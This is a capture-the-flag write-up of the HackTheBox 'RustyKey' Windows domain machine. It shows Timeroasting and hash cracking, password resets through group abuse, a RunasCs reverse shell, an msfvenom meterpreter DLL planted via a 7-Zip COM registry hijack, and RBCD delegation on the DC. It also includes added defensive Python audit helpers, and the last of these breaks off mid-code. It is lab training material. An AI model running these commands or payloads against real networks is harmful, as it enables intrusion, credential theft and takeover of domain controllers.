
HTB-RustyKey

HTB-Machine Hackthebox Windows
Author: HYH

Box Info

OS: Windows
Difficulty: Hard
As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

Nmap

[root@kali] /home/kali/RustyKey  
❯ nmap rustykey.htb -A      

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 13:48:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found

GetTGT (rr.parker)

The credentials provided cannot be used for authentication directly; NTLM logons are rejected with STATUS_NOT_SUPPORTED:

[root@kali] /home/kali/RustyKey  
❯ nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
SMB         10.10.11.75     445    NONE             [*]  x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB         10.10.11.75     445    NONE             [-] \rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED

Complete the client-side Kerberos configuration:

[root@kali] /home/kali  
❯ cat /etc/krb5.conf 
[libdefaults]
    default_realm = RUSTYKEY.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true

[realms]
    RUSTYKEY.HTB = {
        kdc = 10.10.11.75
    }

[domain_realm]
    .rustykey.htb = RUSTYKEY.HTB
    rustykey.htb = RUSTYKEY.HTB

Request a Kerberos ticket and authenticate with it instead:

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'rr.parker':'8#t5HE8L!W3A'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rr.parker.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/rr.parker.ccache

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k 
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 

User Enumerate

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k --users     
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 
LDAP        10.10.11.75     389    dc.rustykey.htb  [*] Enumerated 11 domain users: rustykey.htb
LDAP        10.10.11.75     389    dc.rustykey.htb  -Username-                    -Last PW Set-       -BadPW- -Description-                     
LDAP        10.10.11.75     389    dc.rustykey.htb  Administrator                 2025-06-04 22:52:22 3       Built-in account for administering the computer/domain                                                                                                                            
LDAP        10.10.11.75     389    dc.rustykey.htb  Guest                         <never>             0       Built-in account for guest access to the computer/domain                                                                                                                          
LDAP        10.10.11.75     389    dc.rustykey.htb  krbtgt                        2024-12-27 00:53:40 0       Key Distribution Center Service Account                                                                                                                                           
LDAP        10.10.11.75     389    dc.rustykey.htb  rr.parker                     2025-06-04 22:54:15 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  mm.turner                     2024-12-27 10:18:39 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  bb.morgan                     2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  gg.anderson                   2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  dd.ali                        2025-06-29 14:16:40 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  ee.reed                       2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  nn.marcos                     2024-12-27 11:34:50 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  backupadmin                   2024-12-30 00:30:18 1                                         

Timeroasting to hash leak

Prerequisites

1. The target must be a computer account; ordinary user accounts cannot be targeted directly (unless "targeted Timeroasting" is used to modify their attributes).
2. The target domain controller runs an NTP service that responds to requests carrying the Microsoft SNTP extended authentication (MS-SNTP), with UDP port 123 reachable.
3. The attacker can send unauthenticated MS-SNTP requests to the DC (no valid credentials are needed).
4. The RIDs (relative identifiers) of the domain's computer accounts can be enumerated.
5. (Optional) "Targeted Timeroasting" requires domain administrator privileges to temporarily modify a user account's attributes so that it is treated as a computer account.
6. Computer account passwords in the domain are not strongly protected (for example weak passwords, or passwords that are never rotated).

Script available: SecuraBV/Timeroast: Timeroasting scripts by Tom Tervoort

[root@kali] /home/kali/RustyKey/Timeroast (main) 
❯ python timeroast.py 10.10.11.75
1000:$sntp-ms$541e56ee0785292844cd3a4d402b543b$1c0111e900000000000a104f4c4f434cec0d09c525a2d227e1b8428bffbfcd0aec0d1f45ed925501ec0d1f45ed927b98
1103:$sntp-ms$885a139fd759d37417664243783bbd2e$1c0111e900000000000a104f4c4f434cec0d09c5255a3d63e1b8428bffbfcd0aec0d1f4691626479ec0d1f4691627392
1104:$sntp-ms$50db9bcbb01364753a51d9ad87334e7a$1c0111e900000000000a104f4c4f434cec0d09c525d23c78e1b8428bffbfcd0aec0d1f4691da6033ec0d1f4691da77b0
1105:$sntp-ms$b21dd12e2f54ba103173276b52ac5a28$1c0111e900000000000a104f4c4f434cec0d09c525d5ced4e1b8428bffbfcd0aec0d1f4691ddef33ec0d1f4691de085e
1107:$sntp-ms$72c064df6565397579c07a123fa9a581$1c0111e900000000000a10504c4f434cec0d09c523da9288e1b8428bffbfcd0aec0d1f46a3da7b0bec0d1f46a3da9c99
1106:$sntp-ms$523e1fbcb109b13c7c03f77fb94b0abf$1c0111e900000000000a10504c4f434cec0d09c523d78b6ce1b8428bffbfcd0aec0d1f46a3d7617bec0d1f46a3d79c33
1119:$sntp-ms$33ebfc2674e7536ed6d154a740325d72$1c0111e900000000000a10504c4f434cec0d09c52483a464e1b8428bffbfcd0aec0d1f46b87b692cec0d1f46b87b79f3
1120:$sntp-ms$d5261b4a237d17e07add187f73bf05df$1c0111e900000000000a10504c4f434cec0d09c524956dbae1b8428bffbfcd0aec0d1f46b88d2f28ec0d1f46b88d44f7
1121:$sntp-ms$dd30728f5ecc625b7ee31e136619b14f$1c0111e900000000000a10504c4f434cec0d09c524976866e1b8428bffbfcd0aec0d1f46b88f231eec0d1f46b88f42fe
1118:$sntp-ms$2e21c9e9b562fce0810a6758164a4ebd$1c0111e900000000000a10504c4f434cec0d09c524787ce9e1b8428bffbfcd0aec0d1f46b8703298ec0d1f46b8705780
1122:$sntp-ms$5204997edea3423b2673aec76ca560b1$1c0111e900000000000a10504c4f434cec0d09c524a5da19e1b8428bffbfcd0aec0d1f46b89d9323ec0d1f46b89db156
1123:$sntp-ms$06b411c3bf92a0cf9bb14491d1fb7ef0$1c0111e900000000000a10504c4f434cec0d09c524d3f4dfe1b8428bffbfcd0aec0d1f46b8cb8e08ec0d1f46b8cbcf76
1125:$sntp-ms$d7e7fef91094a412a2e8cb82c7716f1a$1c0111e900000000000a10504c4f434cec0d09c52308c3f3e1b8428bffbfcd0aec0d1f46bb191728ec0d1f46bb193052
1124:$sntp-ms$5e8f8d7411278b141ef09ef40a58197f$1c0111e900000000000a10504c4f434cec0d09c523087d7de1b8428bffbfcd0aec0d1f46bb18cba8ec0d1f46bb18ed36
1126:$sntp-ms$31ac85d513769160227bdd504d415377$1c0111e900000000000a10504c4f434cec0d09c523191f8be1b8428bffbfcd0aec0d1f46bb296c0aec0d1f46bb298bea
1127:$sntp-ms$2bb6c5485dbbd37c5cec188a04944677$1c0111e900000000000a10504c4f434cec0d09c523251208e1b8428bffbfcd0aec0d1f46bb356034ec0d1f46bb358014

Reference: Targeted Timeroasting: Stealing User Hashes With NTP | Medium. Cracking with hashcat requires the beta version; the password was recovered successfully:

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$sntp-ms$d7e7fef91094a412a2e8cb82c7716f1a$1c0111e900000000000a10504c4f434cec0d09c52308c3f3e1b8428bffbfcd0aec0d1f46bb191728ec0d1f46bb193052:Rusty88!
Approaching final keyspace - workload adjusted.
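The `RID:$sntp-ms$<mac>$<reply>` lines produced by timeroast.py above are the raw material for everything that follows, so it is worth seeing exactly what they contain. The Python below is an added example written for this page; it is not part of the Timeroast project or of the original write-up. It validates the line format and decodes the 96-hex-character salt as the 48-byte NTP server reply it actually is (per the Timeroast project's description, the 32-hex MD5 is the MS-SNTP authenticator the DC computed over that reply, keyed with the computer account's password hash). The two sample lines are copied from the output above; `parse_timeroast_output` and the field names are this example's own.

```python
"""Decode Timeroast output lines (added example; not from the write-up or the Timeroast project)."""
import re
import struct
from datetime import datetime, timezone

# Seconds between the NTP epoch (1900-01-01) and the Unix epoch (1970-01-01).
NTP_UNIX_OFFSET = 2_208_988_800

# RID:$sntp-ms$<32 hex MD5 authenticator>$<96 hex = 48-byte NTP reply>
LINE_RE = re.compile(
    r"^(?P<rid>\d+):\$sntp-ms\$(?P<mac>[0-9a-fA-F]{32})\$(?P<reply>[0-9a-fA-F]{96})$"
)

# Two lines copied from the timeroast.py output above: RID 1000 is DC$, RID 1125 is the one cracked.
SAMPLE_OUTPUT = """\
1000:$sntp-ms$541e56ee0785292844cd3a4d402b543b$1c0111e900000000000a104f4c4f434cec0d09c525a2d227e1b8428bffbfcd0aec0d1f45ed925501ec0d1f45ed927b98
1125:$sntp-ms$d7e7fef91094a412a2e8cb82c7716f1a$1c0111e900000000000a10504c4f434cec0d09c52308c3f3e1b8428bffbfcd0aec0d1f46bb191728ec0d1f46bb193052
"""


def ntp_timestamp(raw):
    """Convert an 8-byte NTP timestamp (32.32 fixed point) to an aware UTC datetime."""
    seconds, fraction = struct.unpack(">II", raw)
    return datetime.fromtimestamp(seconds - NTP_UNIX_OFFSET + fraction / 2**32, tz=timezone.utc)


def parse_ntp_reply(reply):
    """Decode the 48-byte NTPv3 header; every field here travels in the clear."""
    if len(reply) != 48:
        raise ValueError("NTP reply must be exactly 48 bytes")
    li_vn_mode, stratum, poll, precision = struct.unpack(">BBBb", reply[:4])
    return {
        "version": (li_vn_mode >> 3) & 0x7,
        "mode": li_vn_mode & 0x7,            # 4 = server reply
        "stratum": stratum,
        "poll": poll,
        "precision": precision,              # log2 seconds, e.g. -23
        "ref_id": reply[12:16],              # 4-char source tag at stratum 1, e.g. b"LOCL"
        "reference": ntp_timestamp(reply[16:24]),
        "originate": ntp_timestamp(reply[24:32]),   # echoed back from the client request
        "receive": ntp_timestamp(reply[32:40]),
        "transmit": ntp_timestamp(reply[40:48]),
    }


def parse_timeroast_line(line):
    """Split one Timeroast line into RID, authenticator and decoded reply."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Timeroast line: {line!r}")
    return {
        "rid": int(m["rid"]),
        "mac": m["mac"],
        "reply": parse_ntp_reply(bytes.fromhex(m["reply"])),
    }


def parse_timeroast_output(text):
    """Parse a whole capture into {rid: record}, skipping blank lines."""
    records = {}
    for line in text.splitlines():
        if line.strip():
            rec = parse_timeroast_line(line)
            records[rec["rid"]] = rec
    return records


if __name__ == "__main__":
    for rid, rec in sorted(parse_timeroast_output(SAMPLE_OUTPUT).items()):
        r = rec["reply"]
        print(f"RID {rid}: mode={r['mode']} stratum={r['stratum']} ref={r['ref_id']!r} "
              f"transmit={r['transmit'].isoformat()}")
```

Nothing in the decoded reply is secret: it is the same answer any NTP client would get. The only secret input to the authenticator is the computer account's password hash, which is why prerequisite 6 above (machine accounts with weak or never-rotated passwords) is what makes the technique pay off. A computer account whose password Windows generated and rotates itself yields an authenticator that is not practically guessable; the one that cracked here had a human-chosen password.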

Bloodhound

[root@kali] /home/kali/RustyKey  
❯ bloodhound-python  -u 'rr.parker' -p '8#t5HE8L!W3A' -k -d rustykey.htb -ns 10.10.11.75 -c ALl --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: rustykey.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 16 computers
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 13 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: dc.rustykey.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 37S
INFO: Compressing output into 20250701095916_bloodhound.zip

This password belongs to the account with RID 1125 above, which is IT-COMPUTER3.

Check its outbound permissions:

AddSelf TO Helpdesk

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'IT-COMPUTER3$':'Rusty88!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in IT-COMPUTER3$.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache 


[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK

Change Password & GetTGT (Failed)

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'Abc123456@'
[+] Password changed successfully!

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

Note the PROTECTED OBJECTS group; the failure is most likely caused by restrictions tied to this group.

To gain access as bb.morgan, the protection has to be removed first.

Remove IT From Protection

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS

Then change the password and log in:

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'Abc123456@'        
[+] Password changed successfully!

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in bb.morgan.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/bb.morgan.ccache 

[root@kali] /home/kali/RustyKey  
❯ evil-winrm -i dc.rustykey.htb -u 'bb.morgan' -r rustykey.htb     
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> type ../desktop/user.txt
<hidden>

PDF In DESKTOP

*Evil-WinRM* PS C:\Users\bb.morgan\desktop> ls


    Directory: C:\Users\bb.morgan\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---         7/1/2025   2:54 AM             34 user.txt


*Evil-WinRM* PS C:\Users\bb.morgan\desktop> download internal.pdf
                                        
Info: Downloading C:\Users\bb.morgan\desktop\internal.pdf to internal.pdf

In summary, it says:

- The **Support group** has temporarily been granted **extended permissions** to test and troubleshoot the file archiving (compress/extract) functionality on shared workstations.
- The purpose is to resolve issues related to context-menu actions reported by the Finance and IT teams.
- **Registry adjustments** may be made during this period.
- Changes to unrelated system components are to be avoided.
- The permission changes are logged and will be revoked once testing is stable.
- Permission errors or missing right-click menu actions should be reported to DevOps.

In other words, the SUPPORT group has permission to modify the registry and can test compression/extraction-related functionality.

Note that the user EE.REED is in the SUPPORT group, but also in the PROTECTED OBJECTS group.

Remove SUPPORT From Protection

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'  
[-] SUPPORT removed from PROTECTED OBJECTS

Then change the password:

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'Abc123456@'                 
[+] Password changed successfully!

But logging in fails.

So a different way to get a shell is needed.

RunasCs (ee.reed)

Upload RunasCs.exe:

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> upload /home/kali/RustyKey/RunasCs.exe
                                        
Info: Uploading /home/kali/RustyKey/RunasCs.exe to C:\Users\bb.morgan\Documents\RunasCs.exe
                                        
Data: 68948 bytes of 68948 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed Abc123456@ powershell.exe -r 10.10.16.47:6666
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e124ff$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6836 created in background.

Listen on the Kali side; the connection comes back:

[root@kali] /home/kali/RustyKey  
❯ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.47] from (UNKNOWN) [10.10.11.75] 62377
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32> 

COM Hijack

Windows applications frequently invoke COM components by CLSID (Class ID); the system loads the matching DLL or EXE according to the registry configuration. An attacker can tamper with the registry entries of an existing COM component so that they point to a malicious DLL. The PDF above gave the relevant hints:

- The **Support group** has temporarily been granted **extended permissions** to test and troubleshoot the file archiving (compress/extract) functionality on shared workstations.
- **Registry adjustments** may be made during this period.

COM Hijack:
- Hijack a COM component's registry key (CLSID) by changing InprocServer32 to point to a malicious DLL/EXE.
- Affects every program that calls that COM component; the hijack fires when a Windows component or application loads the COM object.
- Broad scope, works across processes, and can also be used for UAC bypass and privilege escalation.
- The hijack point is the registry; it abuses the COM object loading flow.

Since both the registry and compression were mentioned, first look for CLSIDs that may be relevant:

PS C:\tmp> reg query HKCR\CLSID /s /f "zip"
reg query HKCR\CLSID /s /f "zip"

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
    (Default)    REG_SZ    Compressed (zipped) Folder SendTo Target
    FriendlyTypeName    REG_EXPAND_SZ    @%SystemRoot%\system32\zipfldr.dll,-10226

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
    (Default)    REG_SZ    Compressed (zipped) Folder Context Menu

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}
    (Default)    REG_SZ    Compressed (zipped) Folder Right Drag Handler

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}
    (Default)    REG_SZ    Compressed (zipped) Folder DropHandler

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

End of search: 14 match(es) found.
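The listing above can be checked mechanically rather than by eye. The Python below is an added audit helper, not part of the write-up: it parses `reg query <key> /s` output of the shape shown and reports every `InprocServer32` default value that points outside directories an unprivileged user cannot write to. The sample text is constructed: it takes two of the keys above and, for the 7-Zip CLSID, substitutes the value the hijack in this write-up later writes (`C:\tmp\hack.dll`) so the check has something to find. The trusted-prefix list and the small environment-variable table are this example's assumptions.

```python
"""Audit InprocServer32 values in `reg query` output (added example; not from the write-up)."""
import re

# Locations an unprivileged user cannot write to on a default install (assumption for this check).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Minimal expansion table for REG_EXPAND_SZ data (assumed default install paths).
ENV = {"%systemroot%": "c:\\windows", "%programfiles%": "c:\\program files"}

# Constructed sample: two keys from the listing above, with the 7-Zip server pointed at C:\tmp\hack.dll.
SAMPLE_REG_QUERY = r"""
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\tmp\hack.dll

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
    (Default)    REG_SZ    Compressed (zipped) Folder Context Menu

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

End of search: 4 match(es) found.
"""


def parse_reg_query(text):
    """Turn `reg query <key> /s` output into {key: {value_name: (type, data)}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("HKEY_"):             # key lines are flush left
            current = raw.strip()
            keys.setdefault(current, {})
        elif raw[0].isspace() and current:      # value lines are indented: name, type, data
            parts = re.split(r"\s{4,}", raw.strip(), maxsplit=2)
            if len(parts) == 3:
                name, vtype, data = parts
                keys[current][name] = (vtype, data)
    return keys


def normalise_path(data):
    """Lower-case, strip quotes and expand the few variables REG_EXPAND_SZ values use here."""
    path = data.strip().strip('"').lower()
    for var, value in ENV.items():
        path = path.replace(var, value)
    return path


def find_untrusted_inproc_servers(text, trusted=TRUSTED_PREFIXES):
    """Return [(clsid, data)] for every InprocServer32 default value outside the trusted roots."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if not key.lower().endswith("\\inprocserver32") or "(Default)" not in values:
            continue
        _, data = values["(Default)"]
        if not normalise_path(data).startswith(trusted):
            clsid = key.rsplit("\\", 2)[-2]
            findings.append((clsid, data))
    return findings


if __name__ == "__main__":
    for clsid, data in find_untrusted_inproc_servers(SAMPLE_REG_QUERY):
        print(f"untrusted in-process server for {clsid}: {data}")
```

Feed it the output of `reg query HKCR\CLSID /s`, and, because HKCR is a merged view in which the per-user `HKCU\Software\Classes` takes precedence over `HKLM\Software\Classes`, query those two hives separately as well. Any hit outside `C:\Windows` or `C:\Program Files` deserves a manual look: an in-process server under a user-writable path such as `C:\tmp` is precisely the condition the hijack in this write-up depends on, and the write that creates it (a value set under `...\CLSID\{...}\InprocServer32`) is a cheap thing to alert on.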

7-Zip stands out. Next, generate a malicious DLL with msfvenom:

[root@kali] /home/kali/RustyKey  
❯  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.47 LPORT=4444 -f dll -o hack.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: hack.dll

After uploading it, modify the registry:

PS C:\tmp>  reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hack.dll" /f
 reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hack.dll" /f
The operation completed successfully.

Set up a listener and a meterpreter session comes back:

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.47:4444 
[*] Sending stage (203846 bytes) to 10.10.11.75
[*] Meterpreter session 1 opened (10.10.16.47:4444 -> 10.10.11.75:62445) at 2025-07-01 11:32:19 -0400

meterpreter > getuid
Server username: RUSTYKEY\mm.turner
meterpreter > 
[*] 10.10.11.75 - Meterpreter session 1 closed.  Reason: Died

RBCD

Reference: (RBCD) Resource-based constrained | The Hacker Recipes

Check mm.turner's permissions: AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks. An attacker holding AddAllowedToAct can grant delegation rights to themselves or to a controlled account and then carry out an impersonation attack (S4U2self/S4U2proxy). So, as soon as the meterpreter session arrives, configure IT-COMPUTER3$ as allowed to delegate to DC, then carry out the RBCD attack:
meterpreter > shell
Process 11164 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
PS C:\Windows> 
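`Set-ADComputer -PrincipalsAllowedToDelegateToAccount` writes a security descriptor into the DC's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, and that descriptor, not a group membership, is what the S4U2proxy request below is checked against. An auditor who wants to know who may currently delegate to a DC therefore has to decode it. The Python below is an added example, not the write-up's code: it builds a descriptor of the shape delegation tooling typically writes (owner BUILTIN\Administrators, one ACCESS_ALLOWED ACE per principal carrying the full-control mask 0x000F01FF; both are assumptions of this example), parses it back into SIDs, and flags any SID not on an approved list. The domain SID is a constructed placeholder; RID 1125 is IT-COMPUTER3's RID from the Timeroasting output above.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity (added example; not from the write-up)."""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
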